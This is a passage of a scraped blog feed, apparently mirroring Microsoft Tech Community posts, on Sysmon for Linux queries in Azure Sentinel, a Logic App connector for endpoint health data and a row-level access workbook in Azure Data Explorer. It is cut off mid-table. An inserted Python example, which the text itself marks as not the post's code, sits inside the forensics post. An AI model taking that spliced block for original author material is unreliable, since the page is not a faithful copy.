<P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sysmon-azure-sentinel.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317442iC2315774403A05F8/image-size/large?v=v2&amp;px=999" role="button" title="sysmon-azure-sentinel.png" alt="sysmon-azure-sentinel.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Next, click on </SPAN><STRONG><SPAN data-contrast="auto">Logs</SPAN></STRONG><SPAN data-contrast="auto"> and run the following Kusto query to see whether all your endpoints are generating events and whether they are being collected by the Azure Log Analytics agent:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">Syslog
| summarize count() by Computer</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sysmon-azure-sentinel-query.png" style="width: 824px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317444iB0EB18AE4C1A1BD0/image-size/large?v=v2&amp;px=999" role="button" title="sysmon-azure-sentinel-query.png" alt="sysmon-azure-sentinel-query.png" /></span></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Querying Sysmon for Linux</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">You can query Sysmon for Linux logs by using the </SPAN><STRONG><SPAN data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto"> table with the following Kusto query, which parses the event XML out of SyslogMessage, pivots each EventData field into its own column and counts events per EventID:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">Syslog
| extend EventID = parse_xml(SyslogMessage).Event.System.EventID
| extend EventData = parse_xml(SyslogMessage).Event.EventData.Data
| mv-expand bagexpansion=array EventData
| evaluate bag_unpack(EventData)
| extend Key=tostring(['@Name']), Value=['#text']
| evaluate pivot(Key, any(Value), TimeGenerated, TenantId, SourceSystem, EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId)
| summarize count() by tostring(EventID)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Additionally, as part of the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASIM</SPAN></A><SPAN data-contrast="auto"> (Azure Sentinel Information Model) project, we have created parsers for </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysmon for Linux</SPAN></A><SPAN data-contrast="auto">. The parsers are imported automatically by the template we use to deploy the lab environment, so you can simply use the parsers available under </SPAN><STRONG><SPAN data-contrast="auto">Functions &gt; Workspace functions</SPAN></STRONG><SPAN data-contrast="auto">:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">vimProcessCreateLinuxSysmon
| limit 10</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux-sysmon-azure-sentinel.png" style="width: 808px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317446i333963A050022498/image-size/large?v=v2&amp;px=999" role="button" title="linux-sysmon-azure-sentinel.png" alt="linux-sysmon-azure-sentinel.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">That’s it! 
You are now ready to use Sysmon for Linux in a lab environment for research and development of detections </SPAN><SPAN data-contrast="auto">;)</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Sysmon for Linux Resources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="21" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel/Parsers/ASim Sysmon for Linux at master · Azure/Azure-Sentinel (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="22" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/Sysmon-For-Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">Sysinternals/SysinternalsEBPF: The Linux port of the Sysinternals Sysmon tool. 
(github.com)</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">Sysinternals/SysmonForLinux (github.com)</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank">MSTIC-Sysmon/linux/configs at main · microsoft/MSTIC-Sysmon (github.com)</A></SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">References</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="24" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">eBPF - Introduction, Tutorials &amp; Community Resources</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="25" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What is eBPF? An Introduction and Deep Dive into the eBPF Technology</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="26" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OTRF/Azure-Sentinel2Go: Azure Sentinel2Go is an open source project developed to expedite the deployment of an Azure Sentinel lab. 
(github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="27" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel To-Go! A Linux :penguin: Lab with AUOMS Set Up to Learn About the OMI Vulnerability :collision: - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Sat, 16 Oct 2021 02:10:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054 Cyb3rWard0g 2021-10-16T02:10:00Z Analyzing Endpoints Forensics - Azure Sentinel Connector https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/analyzing-endpoints-forensics-azure-sentinel-connector/ba-p/2820973 <P><STRONG>Overview &amp; Use Case</STRONG></P> <P>&nbsp;</P> <P>Thanks to&nbsp;<LI-USER uid="1129204"></LI-USER>&nbsp;,&nbsp;<LI-USER uid="490170"></LI-USER> &amp;&nbsp;<LI-USER uid="858693"></LI-USER> for the brainstorming, technical contributions, and proofreading!</P> <P>&nbsp;</P> <P><SPAN>The field of endpoint forensics seeks to help investigators reconstruct what happened during an endpoint intrusion. Did an attacker break in because of a missing definition / signature / policy / setting or a configuration, and if so, how? What havoc did the attacker wreak after breaking in? Tools that help investigators answer these types of questions are still quite primitive and are often hindered by incomplete or incorrect information. 
Analyzing Endpoints Forensics - Azure Sentinel Connector can enable more powerful forensic analysis through techniques such as streaming a computer’s EPP (Endpoint Protection) health status, policies, settings, and configuration, in addition to IoT vulnerable assets, data events &amp; vulnerabilities.</SPAN></P> <P>&nbsp;</P> <P><SPAN>Device (IT/OT) health state and security configuration policies and settings (Microsoft Defender for Endpoint &amp; Azure Defender for IoT) are critical to the SOC team, helping them address the following use cases:</SPAN></P> <P>&nbsp;</P> <UL> <LI>Identifying onboarded devices and their health status</LI> <LI>Activity and security posture for IT/OT assets</LI> <LI>Viewing the compliance status of the devices based on the security recommendations</LI> <LI>Identifying device vulnerabilities and hence providing a triage-matrix remediation framework</LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Implementation</STRONG></P> <P>&nbsp;</P> <P><STRONG>Step(1): Prep, App Registration &amp; Azure Defender for IoT Key</STRONG></P> <UL> <LI>Log in to the Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Search for App Registration &gt; New Registration</LI> <LI>Type a name, make sure the right "supported account type” is selected, then click the Register button</LI> <LI>Define and consent to the API permissions shown below:</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="HeshamSaad_0-1633590871729.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315812iE8B6CA94DB1140C4/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_0-1633590871729.png" alt="HeshamSaad_0-1633590871729.png" /></span></P> <P>&nbsp;</P> <UL> <LI>Get the following 
values:</LI> <UL> <LI>Application / Client ID</LI> <LI>Tenant ID</LI> <LI>Secret</LI> <LI>Azure Active Directory Domain</LI> </UL> </UL> <UL> <LI>Log in to the Azure Defender for IoT central manager console, System Settings &gt; Access Tokens</LI> <LI>Select Generate new token, describe the purpose of the new token, and select</LI> <LI>Copy the token, save it, and select finish</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="HeshamSaad_1-1633590871905.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315813i323ED49533CC7388/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_1-1633590871905.png" alt="HeshamSaad_1-1633590871905.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Step(2): Microsoft Devices Forensics Custom Connector</STRONG></P> <UL> <LI>Log in to the Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Go to Azure Sentinel &gt; Automation</LI> <LI>Create a new blank Playbook and follow the GIF below; the code is uploaded to the&nbsp;<U><A href="#" target="_self">github repo&nbsp;</A></U>as well:</LI> <UL> <LI>Initialize the set of parameters:</LI> <UL> <LI>Name: AD4IoTKey</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;Azure Defender for IoT key value generated in the prep step&gt;</LI> </UL> <LI>Name: Application ID</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration ID value generated in the prep step&gt;</LI> </UL> <LI>Name: Secret</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration secret value generated in the prep step&gt;; it’s recommended to use Key Vault</LI> </UL> <LI>Name: Tenant ID</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration Tenant ID value&gt;</LI> </UL> </UL> <LI>Add a Recurrence trigger to execute the playbook on a schedule</LI> <LI>Add HTTP actions to query and fetch the Microsoft Defender for Endpoint Windows 
required logs (“MDE Hunting Query Agent Health Windows - TVM”); ensure the authorization type is Active Directory OAuth</LI> <LI>Parse the returned content as JSON (Parse JSON action)</LI> <LI>Iterate (For each) over all returned values (Body) of the Microsoft Defender for Endpoint Windows data, then send the data to the Azure Sentinel Log Analytics workspace via a custom log table (AgentHealthStatusWindows)</LI> <LI>Repeat the above steps to cover macOS, storing the data in the MDE_MAC_devicehealth custom log table; you can easily do the same to cover Linux and other supported OS platforms.</LI> <LI>Also repeat the above steps to cover Azure Defender for IoT:</LI> <UL> <LI>Devices</LI> <LI>Events</LI> <LI>CVEs</LI> </UL> </UL> </UL> <P><STRONG>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315819i53E37F4846F652EF/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics1.gif" alt="ITOTForensics1.gif" /></span></STRONG></P> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315820iA50ACB44BFA2E9D0/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics2.gif" alt="ITOTForensics2.gif" /></span></STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Step(3): Microsoft Devices Forensics Workbook &amp; Hunting</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <UL> <LI>Log in to the Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Go to Azure Sentinel &gt; Automation</LI> <LI>Create a new workbook (Add workbook)</LI> <LI>Click on Edit &gt; Advanced Editor (icon)</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="HeshamSaad_3-1633590872309.png" style="width: 
999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315815i705E63F305F804A1/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_3-1633590872309.png" alt="HeshamSaad_3-1633590872309.png" /></span></P> <P>&nbsp;</P> <UL> <LI>Copy and paste the workbook JSON code uploaded to the <A href="#" target="_self">github repo</A>, click Done Editing and save</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315821i8ED183736CC1547E/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics3.gif" alt="ITOTForensics3.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Notes &amp; Considerations</STRONG></P> <P>&nbsp;</P> <UL> <LI>You can customize the parsers in the connector's flow with the required attributes / fields based on your schema / payload before the ingestion process; you can also create custom Azure Functions once the data has been ingested into Azure Sentinel</LI> <LI>An Azure Function can be used to build the custom connector as well</LI> <LI>A couple of points to consider while using Logic Apps:</LI> <UL> <LI>Cost (<A href="#" target="_blank" rel="noopener">standard / enterprise connectors</A>)</LI> <LI><A href="#" target="_blank" rel="noopener">Considerations &amp; Configurations</A></LI> <LI>Nonstandard schema</LI> <LI>Rewriting rules</LI> </UL> </UL> <P>&nbsp;</P> <P><STRONG>Get started today!</STRONG></P> <P>&nbsp;</P> <P>We encourage you to try it now!</P> <P>You can also contribute new connectors, workbooks, analytics and more in Azure Sentinel. 
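</P> <P>As an added example (not the post's code and not the code in its github repo), the three things the playbook above does can also be written as a small Python script, which is the shape an Azure Function version of this connector would take: get a client-credentials token for the app registration from Step 1, run an advanced hunting query against the Microsoft Defender for Endpoint API, and send the results to a custom log table through the Log Analytics HTTP Data Collector API. The hunting query text, the workspace ID and key, and the environment variable names are assumptions; the custom table name AgentHealthStatusWindows is the one used in Step 2, and the signing helpers implement that API's SharedKey scheme.</P>

```python
"""Added example: Python version of the connector pipeline in this post
(token -> MDE advanced hunting -> Sentinel custom log). Not the post's own
code; IDs, keys and the hunting query are placeholders / assumptions."""
import base64
import datetime
import hashlib
import hmac
import json
import os
import urllib.parse
import urllib.request

MDE_API = "https://api.securitycenter.microsoft.com"
LOGIN = "https://login.microsoftonline.com"
# Assumed query: the text of the post's "MDE Hunting Query Agent Health Windows - TVM" is not shown.
HEALTH_QUERY = ('DeviceInfo | where OSPlatform startswith "Windows" '
                '| summarize arg_max(Timestamp, OnboardingStatus) by DeviceName')
LOG_TYPE = "AgentHealthStatusWindows"  # custom table from Step 2 (stored as AgentHealthStatusWindows_CL)


def get_token(tenant_id, client_id, client_secret):
    """Client-credentials token for the MDE API (the app registration from Step 1)."""
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": f"{MDE_API}/.default",
    }).encode()
    req = urllib.request.Request(f"{LOGIN}/{tenant_id}/oauth2/v2.0/token", data=body)
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["access_token"]


def run_hunting_query(token, query):
    """POST the KQL to the advanced hunting endpoint; the response carries Schema and Results."""
    req = urllib.request.Request(
        f"{MDE_API}/api/advancedqueries/run",
        data=json.dumps({"Query": query}).encode(),
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["Results"]


def string_to_sign(content_length, rfc1123_date):
    """Canonical string the Data Collector API expects to be signed."""
    return f"POST\n{content_length}\napplication/json\nx-ms-date:{rfc1123_date}\n/api/logs"


def build_authorization(workspace_id, shared_key_b64, content_length, rfc1123_date):
    """SharedKey header: HMAC-SHA256 over string_to_sign with the base64-decoded
    workspace key, base64-encoded again."""
    key = base64.b64decode(shared_key_b64)
    mac = hmac.new(key, string_to_sign(content_length, rfc1123_date).encode("utf-8"), hashlib.sha256)
    return f"SharedKey {workspace_id}:{base64.b64encode(mac.digest()).decode()}"


def validate_log_type(name):
    """Log-Type becomes the custom table name (_CL is appended): letters, digits and
    underscores only, at most 100 characters."""
    if not name or len(name) > 100 or not all(c.isalnum() or c == "_" for c in name):
        raise ValueError(f"invalid Log-Type {name!r}")
    return name


def post_custom_log(workspace_id, shared_key_b64, log_type, records):
    """Send a JSON array of records to the workspace; returns the HTTP status (200 on success)."""
    body = json.dumps(records).encode("utf-8")
    date = datetime.datetime.now(datetime.timezone.utc).strftime("%a, %d %b %Y %H:%M:%S GMT")
    req = urllib.request.Request(
        f"https://{workspace_id}.ods.opinsights.azure.com/api/logs?api-version=2016-04-01",
        data=body,
        headers={
            "Content-Type": "application/json",
            "Authorization": build_authorization(workspace_id, shared_key_b64, len(body), date),
            "Log-Type": validate_log_type(log_type),
            "x-ms-date": date,
        },
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    # Secrets come from the environment (populate it from Key Vault), never from code or defaults.
    env = os.environ
    token = get_token(env["TENANT_ID"], env["CLIENT_ID"], env["CLIENT_SECRET"])
    rows = run_hunting_query(token, HEALTH_QUERY)
    print("devices returned:", len(rows))
    print("ingest status:", post_custom_log(env["WORKSPACE_ID"], env["WORKSPACE_KEY"], LOG_TYPE, rows))
```

<P>The signing helpers are pure functions, so the canonical string and the SharedKey header can be checked offline before any network call is made; as the playbook notes recommend, keep the client secret and the workspace key in Key Vault and inject them as environment variables rather than storing them as playbook default values.</P> <P>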
Get started now by joining the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters GitHub community</A>.</P> Sun, 10 Oct 2021 08:55:27 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/analyzing-endpoints-forensics-azure-sentinel-connector/ba-p/2820973 Hesham Saad 2021-10-10T08:55:27Z Simple Row-Based Access Workbook: Lab Walk-Through with Azure Sentinel and Azure Data Explorer (ADX) https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/simple-row-based-access-workbook-lab-walk-through-with-azure/ba-p/2804446 <P>In manufacturing, healthcare, and other industries, individuals and security groups need high visibility reporting on their data to enable quick decision-making. This can eliminate unnecessary downtime or solve potential operational problems in isolated locations. Additionally, restricting unnecessary visibility to data across facilities is best practice for zero trust operations.</P> <P>&nbsp;</P> <P>The SOC, however, benefits from data analysis across the entirety of data within their global estate. How then, can we avoid duplicating data and deliver to each operational group the exact level of access they need? Responsible information security requires Availability, Integrity and Confidentiality. Azure Sentinel, as part of the rich ecosystem of Azure, with built-in tools for maintaining comprehensive security, allows for flexibility in addressing data access needs, securely.&nbsp;</P> <P>&nbsp;</P> <P>We're able to use Azure Sentinel to allow SOC analysts access to a broad range of data for threat detection and remediation activities while, through portions of the same data set, allowing facility or data owners visibility to quickly eliminate or mitigate unforeseen operational issues and downtime.&nbsp;Although Azure Sentinel allows <A href="#" target="_blank" rel="noopener">resource-context RBAC</A>, some organizations may desire more granular access controls. 
Azure Data Explorer (ADX) allows granularity of control down to the row level using built-in functions.</P> <P>&nbsp;</P> <P>In this blog post, we will walk through how to create a sample row-level access-based workbook, which can be extended for Enterprise use with solutions such as <A href="#" target="_blank" rel="noopener">Azure Data Factory</A> (ADF). A benefit of using ADF as a data pipeline into ADX is that it allows you to mask and remove data in transit. This may be useful if you only need to preserve a subset of data for forensics or investigation purposes, or if you need to mask sensitive data for any reason.&nbsp;For this sample, we will not be using ADF, but look out for a follow-up blog!</P> <P>&nbsp;</P> <P>Let's start with a few assumptions for this lab:</P> <UL> <LI>We have a set of resources connected to IPs associated with each facility.</LI> <LI>Facility owners should have full access to connection and log details belonging to assets only within their facility ownership responsibilities.</LI> <LI>Resources, networks, assets and changes are tracked within a Central Management Database (CMDB).</LI> <LI>This CMDB is relatively static, so it doesn't make sense to ingest it into Azure Sentinel/Log Analytics; however, it is important to be able to reference it against the logs that are flowing into Azure Sentinel, which the SOC uses for its operations.</LI> </UL> <P>Now let's try it!</P> <H5>&nbsp;</H5> <P>&nbsp;</P> <H3><STRONG><U>Create Security Groups</U></STRONG></H3> <P>The first step we will take to ensure easy management of access control is to set up Security Groups in Azure AD aligning to each facility's permissions.&nbsp;Add users, as required, to each Security Group. 
For the SOC, you'll create or use a group that contains all SOC analysts that need access across all facilities (not shown below).</P> <P>&nbsp;</P> <P>You'll see in the image below that these users can be B2B users as well as employees:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633125941252.png" style="width: 948px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314495iC94E6C83F1836647/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633125941252.png" alt="Beth_Bischoff_0-1633125941252.png" /></span></P> <H3>&nbsp;</H3> <H3><STRONG><U>Create an Azure Data Explorer cluster and</U></STRONG><STRONG><U>&nbsp;ingest data</U></STRONG></H3> <P><SPAN style="font-family: inherit;">The next step for our sample is to create a new Azure Data Explorer (ADX) cluster by searching for this PaaS service in your Azure Portal and adding a database:</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633125978561.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314496i7E5E837DF0AD11EA/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633125978561.png" alt="Beth_Bischoff_1-1633125978561.png" /></span></P> <P>&nbsp;</P> <P>Read permissions <EM><U>do</U></EM> need to be specifically granted to the Resource Group in which the ADX cluster resides, as well as to the cluster and database, so you'll want to use the Access Control (IAM) settings and permissions to grant this permission to all users who will need partial access to the data.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Beth_Bischoff_2-1633126020454.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314497i6C140807AADA794F/image-size/large?v=v2&amp;px=999" 
role="button" title="Beth_Bischoff_2-1633126020454.png" alt="Beth_Bischoff_2-1633126020454.png" /></span><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Beth_Bischoff_0-1633204685659.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314596iFAE03AA32E7E09D6/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633204685659.png" alt="Beth_Bischoff_0-1633204685659.png" /></span></P> <P>&nbsp;</P> <P>The first step within the ADX cluster database will be to open the Query Editor and Run the ".create table" command to define your table schema. This should align to the fields of the Database to which you will be granting restricted and full access.</P> <P>&nbsp;</P> <P>For our example, we'll use a CSV file to make this quick and easy, so if you'd like to follow along, you can use this command inside the "Query" window of the ADX Database, then click:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Beth_Bischoff_0-1633197802549.png" style="width: 52px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314588i3E076EB759A84997/image-dimensions/52x32?v=v2" width="52" height="32" role="button" title="Beth_Bischoff_0-1633197802549.png" alt="Beth_Bischoff_0-1633197802549.png" /></span></P> <P style="margin: 0in;"><SPAN style="font-size: 11.0pt; font-family: 'Calibri',sans-serif;">:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">.create table CMDBData (Geo: string, Geo_Delivery_Lead: string, Description: string, Hostname: string, Location: string, IPAddress: string, Network_Desc: string, Plant_Owner: string, site: string)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Here, your table will be created with empty columns, which will be filled in a minute with an uploaded CSV file:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper 
lia-image-align-inline" image-alt="Beth_Bischoff_1-1633198003211.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314590i4E7DF25E7A885958/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633198003211.png" alt="Beth_Bischoff_1-1633198003211.png" /></span></P> <P>&nbsp;</P> <P>For the CSV file, we've whipped up some fake data, enough to prove the solution works and see this at a glance later on. Note that the column names and types align with the table fields that you've created above.</P> <P style="margin: 0in;">&nbsp;</P> <TABLE border="1" width="99.90375360923967%"> <TBODY> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt; width: 48pt;">Geo</TD> <TD width="13.763233878729547%" height="14px" style="width: 48pt;">Geo_Delivery_Lead</TD> <TD width="13.089509143407122%" height="14px" style="width: 48pt;">Description</TD> <TD width="13.282001924927817%" height="14px" style="width: 48pt;">Hostname</TD> <TD width="6.833493743984601%" height="14px" style="width: 48pt;">Location</TD> <TD width="10.39461020211742%" height="14px" style="width: 48pt;">IPAddress</TD> <TD width="10.68334937439846%" height="14px" style="width: 48pt;">Network_Desc</TD> <TD width="17.805582290664102%" height="14px" style="width: 48pt;">Plant_Owner</TD> <TD width="4.716073147256978%" height="14px" style="width: 48pt;">site</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI224</TD> <TD width="13.763233878729547%" height="14px">Scott</TD> <TD width="13.089509143407122%" height="14px">DC</TD> <TD width="13.282001924927817%" height="14px">DC.domain</TD> <TD width="6.833493743984601%" height="14px">22 Bldg</TD> <TD width="10.39461020211742%" height="14px">172.16.16.100</TD> <TD width="10.68334937439846%" height="14px">PCN-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD 
width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI225</TD> <TD width="13.763233878729547%" height="14px">Sally</TD> <TD width="13.089509143407122%" height="14px">DMZ Workstation</TD> <TD width="13.282001924927817%" height="14px">DMZ_Workstation</TD> <TD width="6.833493743984601%" height="14px">22 Lab</TD> <TD width="10.39461020211742%" height="14px">172.16.1.4</TD> <TD width="10.68334937439846%" height="14px">PIN-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI226</TD> <TD width="13.763233878729547%" height="14px">Sam</TD> <TD width="13.089509143407122%" height="14px">UserWS</TD> <TD width="13.282001924927817%" height="14px">Ecart</TD> <TD width="6.833493743984601%" height="14px">22 Site</TD> <TD width="10.39461020211742%" height="14px" class="xl63">158.81.67.141</TD> <TD width="10.68334937439846%" height="14px">SIM-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_IL6112</TD> <TD width="13.763233878729547%" 